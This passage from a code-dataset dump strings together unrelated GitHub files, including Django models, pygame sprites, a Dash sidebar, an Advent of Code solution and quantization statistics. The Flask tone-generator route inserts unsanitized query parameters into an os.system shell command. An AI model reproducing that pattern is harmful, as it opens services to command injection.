import models\n\n\n# Create your models here.\nclass BotUser(models.Model):\n tg_id = models.CharField(max_length=256)\n # is_open_for_requests = models.BooleanField(default=False)\n open_for_requests_until = models.DateTimeField(null=True, blank=True)\n\n first_name = models.CharField(max_length=256, blank=True, null=True)\n last_name = models.CharField(max_length=256, blank=True, null=True)\n username = models.CharField(max_length=256, blank=True, null=True)\n\n def get_username(self):\n return self.username if self.username else f'{self.first_name} {self.last_name}'\n\n\nclass Match(models.Model):\n requester_tg_id = models.PositiveIntegerField()\n responder_tg_id = models.PositiveIntegerField()\n 
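# auto_now_add stamps the row once, when the match record is first saved\n 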
created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Log(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n data = models.JSONField()\n","repo_name":"alifanov/drinker_bot","sub_path":"bot/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"71010047407","text":"import json\nimport zipfile\nimport os\n\n\"\"\" RUN FROM TDT4265_project \"\"\"\n\npath_to_zip_file = 'send_to_your_computer.zip'\n\npath_to = 'submissions/predictions'\n\nfolders = os.listdir(path_to)\nfolders = [folder for folder in folders if folder.startswith('pred') and len(folder) == 6]\nidentifier = str(int(folders[-1][-2:]) + 1)\n\nfoldername = 'pred' + identifier\n\nsavefolder = path_to + '/' + foldername\n\nwith zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:\n zip_ref.extractall(savefolder)\n\nos.remove(path_to_zip_file)\n\nlabels_path = savefolder\nimage_folder_path = 'RDD2022/Norway/test/images'\n\nsubmission_json_path = f'{path_to}/submission{identifier}.json'\noutput_json_path = f'{path_to}/output{identifier}.json'\nprint(labels_path)\nprint(submission_json_path)\nprint(image_folder_path)\n\nos.system(f'globox convert {labels_path} {submission_json_path} --format yolov5 --save_fmt coco --img_folder {image_folder_path} --coco_auto_ids')\n\nwith open(submission_json_path, 'r') as f:\n data = json.load(f)\n anns = data['annotations']\nwith open(output_json_path, 'w') as f:\n json.dump(anns, f)","repo_name":"TinusAlsos/TDT4265_project","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23350346407","text":"\"\"\"\n{\n \"title\": \"Sidebar Layout\",\n \"owner\": (\"Wafa'a Aburub\", \"wafaa.github@gmail.com\"),\n \"description\": \"Collection of dash components; create the dashboard sidebar.\"\n}\n\"\"\"\n\n\nfrom dash import html\nfrom datetime import date\nfrom components.styles import sidebar_style, linkedin_logo_style, text_style, job_title_img_style, \\\n profile_headline_style, signup_img_style, registration_date_style\n\n\ndef render(owner_name: str, profile_link: str, geo_loc: str, profile_headline: str, registration_date: date) -> html.Div:\n \"\"\"\n Adds a layout to the dashboard interface sidebar.\n \"\"\"\n\n sidebar = html.Div(\n [\n html.Img(src=\"../assets/linkedin_logo.png\", width=\"200\", height=\"50\", style=linkedin_logo_style),\n html.Hr(),\n\n html.A(children=owner_name, href=profile_link, target=\"_blank\", className=\"lead\", style=text_style),\n html.P(geo_loc, style=text_style),\n\n html.Div([html.Img(src=\"../assets/job_title_img.png\", width=\"32\", height=\"32\", style=job_title_img_style),\n html.P(profile_headline, style=profile_headline_style)]),\n\n html.Div([html.Img(src=\"../assets/signup_img.png\", width=\"40\", height=\"40\", style=signup_img_style),\n html.P(\"Registration Date\\n {}\".format(registration_date), style=registration_date_style)])],\n\n style=sidebar_style)\n\n return sidebar\n\n\n","repo_name":"Wafaa-AbuRub/LinkedIn-Profile-Analysis-Dashboard","sub_path":"components/sidebar.py","file_name":"sidebar.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12043447800","text":"# Imports\nfrom datetime import datetime\nfrom time import sleep\nimport 
os # Needed for clearing screen each second\nimport sys # For exiting program (cleanly)\n\ndef dateDiffInSeconds(date1, date2):\n # [(Target date&time) - (Current date&time)]\n timedelta = date2 - date1\n return timedelta.days * 24 * 3600 + timedelta.seconds\n\ndef daysHoursMinutesSecondsFromSeconds(seconds):\n\tminutes, seconds = divmod(seconds, 60)\n\thours, minutes = divmod(minutes, 60)\n\tdays, hours = divmod(hours, 24)\n\treturn (days, hours, minutes, seconds)\n\n# Ask user for the target date & time, to count down to\nprint(\"\\nThe clock will be displayed in the following format: \")\nprint(\"YYYY-MM-DD %H:%M:%S\\n\")\nprint(\"Please enter a target date and time for the countdown.\")\n\nyear = int(input(\"\\nEnter the year (YYYY): \"))\nmonth = int(input(\"\\nEnter the month (MM): \"))\nday = int(input(\"\\nEnter the day (DD): \"))\nhour = int(input(\"\\nEnter the hour (24-hr format)(hh): \"))\nminute = int(input(\"\\nEnter the minute (mm): \"))\nsecond = int(input(\"\\nEnter the second (ss): \"))\n\nreq = datetime(year, month, day, hour, minute, second)\nnow = datetime.now()\n\nwhile req>now:\n # Clear terminal screen upon launching applet\n os.system('cls||clear')\n print(\"%dd %dh %dm %ds\" % daysHoursMinutesSecondsFromSeconds(dateDiffInSeconds(now, req)))\n sleep(1)\n\n now = datetime.now()\n\n# Let the user know that the countdown has finished\nprint(\"Done\")\n# Exit program cleanly\nsys.exit()\n","repo_name":"TimelessFez/Py-Minus","sub_path":"pyminus.py","file_name":"pyminus.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11460067407","text":"#!/usr/bin/env python3\nimport pygame as pg\nfrom settings import *\nfrom UltraColor import *\nimport pytmx\nvec = pg.math.Vector2\n\n\nclass Spritesheet:\n # utility class for loading and parsing spritesheets\n def __init__(self, filename):\n self.spritesheet = pg.image.load(filename).convert()\n\n def get_image(self, x, y, width, height):\n # grab an image out of a larger spritesheet\n image = pg.Surface((width, height))\n image.blit(self.spritesheet, (0, 0), (x, y, width, height))\n return image\n\n\nclass Player(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.get_faces()\n self.image = self.south\n self.image.set_colorkey(Color.Black)\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n self.x = x\n self.y = y\n self.pos = x, y\n\n\n def get_keys(self):\n\n self.vx, self.vy = 0, 0\n keys = pg.key.get_pressed()\n if keys[pg.K_LEFT] or keys[pg.K_a]:\n self.vx = -PLAYER_SPEED\n if keys[pg.K_RIGHT] or keys[pg.K_d]:\n self.vx = PLAYER_SPEED\n if keys[pg.K_UP] or keys[pg.K_w]:\n self.vy = -PLAYER_SPEED\n if keys[pg.K_DOWN] or keys[pg.K_s]:\n self.vy = PLAYER_SPEED\n if self.vx != 0 and self.vy != 0:\n self.vx *= 0.7071\n self.vy *= 0.7071\n\n\n def get_faces(self):\n self.south = self.game.spritesheet.get_image(0, 0, 32, 32)\n self.south.set_colorkey(Color.Black)\n self.north = self.game.spritesheet.get_image(32, 32, 32, 32)\n self.north.set_colorkey(Color.Black)\n self.east = self.game.spritesheet.get_image(0, 32, 32, 32)\n self.east.set_colorkey(Color.Black)\n self.west = self.game.spritesheet.get_image(32, 0, 32, 32)\n self.west.set_colorkey(Color.Black)\n\n\n\n def collide_with_walls(self, dir):\n if dir == 'x':\n hits = pg.sprite.spritecollide(self, self.game.walls, False)\n if hits:\n if self.vx > 0:\n 
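# moving right: place the player's right edge flush against the wall's left edge\n 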
self.x = hits[0].rect.left - self.rect.width\n if self.vx < 0:\n self.x = hits[0].rect.right\n self.vx = 0\n self.rect.x = self.x\n if dir == 'y':\n hits = pg.sprite.spritecollide(self, self.game.walls, False)\n if hits:\n if self.vy > 0:\n self.y = hits[0].rect.top - self.rect.height\n if self.vy < 0:\n self.y = hits[0].rect.bottom\n self.vy = 0\n self.rect.y = self.y\n\n def update(self):\n self.get_keys()\n self.x += self.vx * self.game.dt\n self.y += self.vy * self.game.dt\n self.rect.x = self.x\n self.collide_with_walls('x')\n self.rect.y = self.y\n self.collide_with_walls('y')\n\nclass Wall(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.walls\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = pg.Surface((TILESIZE, TILESIZE))\n self.image.fill(Color.Green)\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x * TILESIZE\n self.rect.y = y * TILESIZE\n\n\nclass Obstacle(pg.sprite.Sprite):\n def __init__(self, game, x, y, w, h):\n self.groups = game.walls\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.rect = pg.Rect(x, y, w, h)\n self.x = x\n self.y = y\n self.rect.x = x\n self.rect.y = y\n\n\nclass Portals(pg.sprite.Sprite):\n def __init__(self, game, x, y, w, h, properties):\n self.groups = game.portals\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.properties = properties\n self.rect = pg.Rect(x, y, w, h)\n self.x = x\n self.y = y\n self.rect.x = x\n self.rect.y = y\n\n\nclass Door(pg.sprite.Sprite):\n def __init__(self, game, x, y, w, h):\n self.groups = game.door\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.rect = pg.Rect(x, y, w, h)\n self.x = 248\n self.y = 148\n self.rect.x = x\n self.rect.y = y\n\n","repo_name":"Syliel/TileBasedRPG","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38487691944","text":"icon_path = mari.resources.path('ICONS')\n\ndef selectionMask(invert):\n\tcurrentObj = mari.geo.current()\n\tcurrentChan = currentObj.currentChannel()\n\tcurrentLayer = currentChan.currentLayer()\n\tselectedPatches = currentObj.selectedPatches()\n\t\n\tnewMaskImageSet = currentLayer.makeMask()\n\tmari.history.startMacro('Create custom mask')\n\tfor image in newMaskImageSet.imageList():\n\t\tif invert == False:\n\t\t\timage.fill(mari.Color(0.0, 0.0, 0.0, 1.0))\n\t\telse:\n\t\t\timage.fill(mari.Color(1.0, 1.0, 1.0, 1.0))\n\t\n\tfor patch in selectedPatches:\n\t\tselectedImage = currentObj.patchImage(patch, newMaskImageSet)\n\t\tif invert == False:\n\t\t\tselectedImage.fill(mari.Color(1.0, 1.0, 1.0, 1.0))\n\t\telse:\n\t\t\tselectedImage.fill(mari.Color(0.0, 0.0, 0.0, 1.0))\n\tmari.history.stopMacro()\n\n## Layer mask from selection ACTION\nselectMaskITEM = mari.actions.create('From Selection', 'selectionMask(invert=False)')\nselectMaskITEM.setIconPath('%s/SelectAll.png' % icon_path)\nselectMaskInvertITEM = mari.actions.create('From Selection(Invert)', 'selectionMask(invert=True)')\nselectMaskInvertITEM.setIconPath('%s/SelectInvert.png' % icon_path)\n\nmari.menus.addAction(selectMaskITEM, 'MainWindow/&Layers/Layer Mask/Add Mask')\nmari.menus.addAction(selectMaskInvertITEM, 'MainWindow/&Layers/Layer Mask/Add 
Mask')","repo_name":"bneall/bnMariTools","sub_path":"bnMaskFromSelection.py","file_name":"bnMaskFromSelection.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"370566799","text":"import re\n\nwith open('Day21.txt') as file:\n lines = [line.strip() for line in file if line.strip()]\n\ningredients = [] # List of ingredients (includes duplicates for different foods)\nallergens = {} # Key -> allergen, Value -> ingredients that possibly contain allergen\nfor line in lines:\n ingredients_list = re.search('(.*) \\(', line).group(1).split(' ')\n allergens_list = re.search('contains (.*)\\)', line).group(1).split(', ')\n\n for i in ingredients_list:\n ingredients.append(i)\n\n for a in allergens_list:\n if a not in allergens:\n allergens[a] = ingredients_list\n else:\n allergens[a] = [existing_a for existing_a in allergens[a] if existing_a in ingredients_list]\n\n# Remove ingredients that could contain allergens\nfor ilist in allergens.values():\n for i in ilist:\n ingredients = list(filter((i).__ne__, ingredients))\nprint(len(ingredients)) #p1\n\n# Determine mapping between allergens and ingredients\ntaken_allergens = set()\nwhile any(len(ilist) != 1 for ilist in allergens.values()):\n for a, ilist in allergens.items():\n if len(ilist) == 1:\n taken_allergens.add(ilist[0])\n else:\n for ta in taken_allergens:\n allergens[a] = list(filter((ta).__ne__, allergens[a]))\n\n# Determine canonical dangerous ingredients list\ncdil = ''\nfor a in sorted(allergens):\n if cdil:\n cdil = cdil + ',' + allergens[a][0]\n else:\n cdil = allergens[a][0]\nprint(cdil)","repo_name":"joshlevin91/Advent","sub_path":"2020/Day21.py","file_name":"Day21.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6884506529","text":"import configparser\n\nfrom mypythia.extractor.tools import (\n preprocess_message,\n process_candle,\n process_message,\n upload_candle,\n)\nfrom mypythia.processors.pulsar_processor import PulsarProcessor\n\nCONFIG = configparser.ConfigParser()\nCONFIG.read(\"config.ini\")\n\n\nwith PulsarProcessor() as pulsar:\n consumer = pulsar.subscribe(\n CONFIG[\"topics\"][\"TopicRequest\"], name=\"my_pythia_extractor\"\n )\n\n while True:\n msg = consumer.receive()\n try:\n preprocessed_msg = preprocess_message(msg)\n candles = process_message(preprocessed_msg)\n candles = [process_candle(preprocessed_msg[\"ticker\"], c) for c in candles]\n for c in candles:\n upload_candle(c)\n consumer.acknowledge(msg)\n except Exception:\n consumer.negative_acknowledge(msg)\n","repo_name":"wol4aravio/my-pythia","sub_path":"mypythia/extractor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71267922286","text":"import os\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route(\"/start\")\ndef start():\n shape = request.args.get('shape') # this should be a number\n pitch = request.args.get('pitch') # this should also be a number\n # split this into process as per plans\n os.system(f'./utils/send-text.sh \"{pitch},{shape}\"')\n\n@app.route(\"/stop\")\ndef stop():\n os.system(f'./utils/send-text.sh 
\"stop\"')\n","repo_name":"chrisruenes1/Collisions-I","sub_path":"provisioning/tone_generator/tone_generator_server.py","file_name":"tone_generator_server.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37401954151","text":"import networkx as nx\nimport numpy as np\n\nfrom fundl.datasets import make_graph_counting_dataset\nfrom fundl.utils import l2_normalize, pad_graph\n\n\ndef test_pad_graph():\n G = make_graph_counting_dataset(1)[0]\n\n to_size = 15\n\n F = np.vstack([d[\"features\"] for n, d in G.nodes(data=True)])\n A = np.asarray(nx.adjacency_matrix(G).todense())\n\n F, A = pad_graph(F, A, to_size=15)\n assert len(F) == len(A)\n assert len(F) == 15\n\n\ndef test_l2_normalize():\n x = np.array([[3, -3, 5, 4], [4, 5, 3, -3]])\n\n expected = np.array(\n [\n [3 / 5, -3 / np.sqrt(34), 5 / np.sqrt(34), 4 / 5],\n [4 / 5, 5 / np.sqrt(34), 3 / np.sqrt(34), -3 / 5],\n ],\n dtype=np.float32,\n )\n\n assert np.allclose(l2_normalize(x, axis=0), expected)\n","repo_name":"ericmjl/fundl","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"2"} +{"seq_id":"24591668253","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.contrib.gis.db.models.fields\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='User',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('email', models.EmailField(unique=True, max_length=75)),\n ('mobileno', models.CharField(max_length=32, blank=True)),\n ('firstname', models.CharField(max_length=64, blank=True)),\n ('lastname', models.CharField(max_length=64, blank=True)),\n ('changed', models.DateTimeField(null=True, editable=False)),\n ('created', models.DateTimeField(null=True, editable=False)),\n ('isactive', models.BooleanField(default=True, help_text=b'Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name=b'active')),\n ('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. 
A user will get all permissions granted to each of his/her group.', verbose_name='groups')),\n ('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Location',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('point', django.contrib.gis.db.models.fields.PointField(srid=4326)),\n ('radius', models.IntegerField(default=10, help_text=b'in metres')),\n ('text', models.TextField()),\n ('clue', models.TextField(blank=True)),\n ('payload', models.TextField(blank=True)),\n ('extra', models.TextField(blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TreasureHunt',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField()),\n ('place', models.CharField(max_length=255)),\n ('starttime', models.DateTimeField(null=True, blank=True)),\n ('issequential', models.BooleanField(default=False)),\n ('isphysical', models.BooleanField(default=False)),\n ('admin', models.ForeignKey(related_name='ownhunts', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserLocation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ('isconfirmed', models.BooleanField(default=False)),\n ('location', models.ForeignKey(to='hunts.Location')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='UserTreasureHunt',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ('treasurehunt', models.ForeignKey(to='hunts.TreasureHunt')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='treasurehunt',\n name='users',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='hunts.UserTreasureHunt'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='location',\n name='treasurehunt',\n field=models.ForeignKey(blank=True, to='hunts.TreasureHunt', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='location',\n name='users',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='hunts.UserLocation'),\n preserve_default=True,\n ),\n ]\n","repo_name":"withcamp/bittreasure","sub_path":"hunts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17947443575","text":"import requests\r\nimport json\r\nimport pandas as pd\r\n\r\nleague_id = 688639493300912128\r\nusers_in_league = f'https://api.sleeper.app/v1/league/{league_id}/users'\r\n\r\nusers_response = requests.get(users_in_league)\r\nusers_response = json.loads(users_response.text)\r\nusers_response = pd.DataFrame(users_response)\r\n\r\ndf_users = users_response\r\ndf_drafts = pd.DataFrame()\r\ndf_picks = 
pd.DataFrame()\r\n\r\nfor user_id in users_response['user_id']:\r\n draft_by_user = f'https://api.sleeper.app/v1/user/{user_id}/drafts/nfl/2021'\r\n drafts_response = requests.get(draft_by_user)\r\n drafts_response = json.loads(drafts_response.text)\r\n drafts_response = pd.DataFrame(drafts_response)\r\n drafts_response['user_id'] = user_id\r\n df_drafts = pd.concat([df_drafts, drafts_response], axis=0)\r\n \r\n \r\ndf_drafts['teams'] = df_drafts['settings'].apply(lambda x: x['teams'])\r\ndf_drafts['format'] = df_drafts['metadata'].apply(lambda x: x['scoring_type'])\r\ndf_drafts = df_drafts[['user_id', 'draft_id', 'teams', 'format']]\r\n \r\nfor i in enumerate(df_drafts.index):\r\n draft_id = df_drafts['draft_id'].iloc[i[0]]\r\n user_id = df_drafts['user_id'].iloc[i[0]]\r\n draft_picks = f'https://api.sleeper.app/v1/draft/{draft_id}/picks'\r\n drafts_picks_response = requests.get(draft_picks)\r\n drafts_picks_response = json.loads(drafts_picks_response.text)\r\n drafts_picks_response = pd.DataFrame(drafts_picks_response)\r\n drafts_picks_response['draft_id'] = draft_id\r\n drafts_picks_response['user_id'] = user_id\r\n df_picks = pd.concat([df_picks, drafts_picks_response], axis=0)\r\n\r\n\r\n\r\ndf_picks = df_picks[df_picks['user_id'] == df_picks['picked_by']]\r\ndf_picks = df_picks[['draft_id', 'round', 'player_id', 'pick_no', 'user_id']]\r\ndf_picks = pd.merge(df_picks, df_drafts[['draft_id', 'teams', 'format']], how='left', on='draft_id')\r\ndf_picks = pd.merge(df_picks, df_users[['user_id', 'display_name']], how='left', on='user_id')\r\n\r\nsleeper = pd.DataFrame(json.loads(requests.get('https://api.sleeper.app/v1/players/nfl').text))\r\nsleeper = sleeper.transpose()\r\n\r\ndf_picks = pd.merge(df_picks, sleeper[['full_name', 'player_id', 'position']], how='left', on='player_id')\r\ndf_picks.to_excel('league_picks.xlsx', index=False)\r\n","repo_name":"fourshadowz/draft_aid","sub_path":"draft-aid/league_picks.py","file_name":"league_picks.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70400865328","text":"import time\n\n## write your code as always...\nclass MyClass:\n\n def shortComputation(self):\n return 1 + 1\n\n def longComputation(self):\n time.sleep(3)\n return 6 * 7\n\n### Module testing ###\nimport testing\n\nclass Test(testing.AutoTest):\n \"\"\"Example Test\"\"\"\n\n TAGS = [ testing.LONG ]\n\n def test_longComputation( self ):\n \"\"\"example.longComputation test\"\"\"\n\n self.m = MyClass()\n self.result = self.m.longComputation()\n\n if self.local: ## only if the module is executed directly\n print('long computation result: %r' % self.result) \n\n self.assertEqual( self.result, 42, 'unexpected result' )\n\n\n def test_shortComputation(self):\n \"\"\"example.shortComputation test\"\"\"\n\n self.m = MyClass()\n self.result_short = self.m.shortComputation()\n\n if self.local: ## only if the module is executed directly\n print('short computation result: %r' % self.result_short) \n\n self.assertEqual( self.result_short, 2, 'unexpected result' )\n \n \nif __name__ == '__main__':\n\n ## run Test and push self.* fields into global namespace\n testing.localTest( )\n\n ## works thanks to some namespace magic in localTest\n print('The last result of the last test was\\n %r' % result) 
\n","repo_name":"graik/autotesting","sub_path":"examplepackage/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"21350099891","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import (\n TaskListAPIView,\n TaskCreateApiView,\n TaskDetailAPIView\n )\n\nurlpatterns = [\n url(r'^task-list/$', TaskListAPIView.as_view(), name='task-list-api'),\n url(r'^task-create/$', TaskCreateApiView.as_view(), name='task-create-api'),\n url(r'^task-detail/(?P\\d+)/$',TaskDetailAPIView.as_view(),name='task-detail-api',\n),\n]\n","repo_name":"maxysilaen/88","sub_path":"TODO/tasks/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71701189167","text":"import os\nimport util.util as util\nfrom util.evaluation import show_soundfields\n\ndef evaluate_general_ssim_nmse(config_path:str):\n \"\"\"\n Runs the evaluation of prediction performance through Structural\n Similarity (SSIM) and Normalized Mean Squared Error (NMSE) and saves\n inside ssion file a plot showing the results\n\n \"\"\"\n config = util.load_config(config_path)\n print('Loaded configuration from: %s' % config_path)\n session_dir = config_path[:config_path.rfind('/')+1]\n evaluation_path = os.path.join(session_dir, 'simulated_data_evaluation', 'min_mics_' + str(config['evaluation']['min_mics']) +\n '_max_mics_' + str(config['evaluation']['max_mics']) + '_step_mics_' +\n str(config['evaluation']['step_mics'])).replace(\"\\\\\",\"/\")\n\n if not os.path.exists(evaluation_path): os.mkdir(evaluation_path)\n\n util.analyze_and_plot_simulated_results(evaluation_path,config,dB=True)\n \ndef compare_soundfields(config_path):\n \"\"\"\n Plot side-by-side the ground-truth and predicted soundfields,\n for the frequencies set on \"config.json\"\n \"\"\"\n config = util.load_config(config_path)\n print('Loaded configuration from: %s' % config_path)\n\n session_dir = config_path[:config_path.rfind(\"/\")+1]\n visualization_path = os.path.join(session_dir,\"visualization/\")\n show_soundfields(soundfield_path=visualization_path, \n freq_shown = config[\"evaluation\"][\"frequencies\"])\n\n","repo_name":"aogdrummond/deep_learning_module","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"35690274779","text":"from . 
models import Question\nfrom django.utils import timezone\n\ndef update_poll_status():\n # find polls that created 12 hour ago and set them completed status to True\n\n # test for less time\n twelve_hour_ago = timezone.now() - timezone.timedelta(hours=12)\n completed_questions = Question.objects.filter(\n pub_date__lte=twelve_hour_ago\n )\n if completed_questions:\n for question in completed_questions:\n question.completed = True\n question.save()\n else:\n return True\n","repo_name":"berekashvili22/DjangoPolls","sub_path":"PollsProject/api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34122827833","text":"import math\nfrom typing import Optional, Tuple\n\nimport torch\nfrom torch import Tensor\nfrom torch.nn import Parameter\n\nimport brevitas\nfrom brevitas import config\nfrom brevitas.core.utils import StatelessBuffer\nfrom brevitas.function.ops import max_int\n\nfrom .stats_wrapper import SCALAR_SHAPE\n\nDEFAULT_STD_DEV_EPSILON = 1e-8\n\n\nclass NegativeMinOrZero(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(NegativeMinOrZero, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n self.zero = StatelessBuffer(torch.tensor(0.0))\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor) -> Tensor:\n if self.stats_reduce_dim is None:\n min_val = torch.min(x)\n else:\n min_val = torch.min(x, dim=self.stats_reduce_dim)[0]\n min_val = torch.where(\n min_val <= self.zero().to(min_val.dtype), min_val, self.zero().to(min_val.dtype))\n return min_val\n\n\nclass AbsPercentile(brevitas.jit.ScriptModule):\n __constants__ = ['q', 'stats_reduce_dim']\n\n def __init__(\n self, high_percentile_q: float, stats_reduce_dim: Optional[int], percentile_q=None):\n super(AbsPercentile, self).__init__()\n if percentile_q is not None:\n raise RuntimeError(\"percentile_q is deprecated, please pass high_percentile_q.\")\n assert high_percentile_q <= 100, \"q has to be a percentage\"\n self.q = high_percentile_q\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n # k is 1-indexed, so round away from zero\n k = int(math.floor(.01 * self.q * x.numel() + 0.5))\n result = x.abs().view(-1).kthvalue(k).values\n else:\n # assuming x is two dimensional, get the other dimension\n assert len(x.size()) == 2, \"Only 2-dim input is supported.\"\n other_dim = abs(self.stats_reduce_dim - 1)\n dim_slice = torch.narrow(x, dim=other_dim, start=0, length=1)\n # k is 1-indexed, so round away from zero\n k = int(math.floor(.01 * self.q * dim_slice.numel() + 0.5))\n result = x.abs().kthvalue(k, dim=self.stats_reduce_dim).values\n return result\n\n\nclass NegativePercentileOrZero(brevitas.jit.ScriptModule):\n __constants__ = ['stats_reduce_dim', 'q']\n\n def __init__(self, low_percentile_q, stats_reduce_dim: Optional[int] = None) -> None:\n super(NegativePercentileOrZero, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n self.q = low_percentile_q\n self.zero = StatelessBuffer(torch.tensor(0.0))\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor) -> Tensor:\n if self.stats_reduce_dim is None:\n # k is 1-indexed, so round away from zero\n k = int(math.ceil(.01 * self.q * x.numel()))\n result = x.view(-1).kthvalue(k).values\n else:\n # assuming x is two dimensional, get the other 
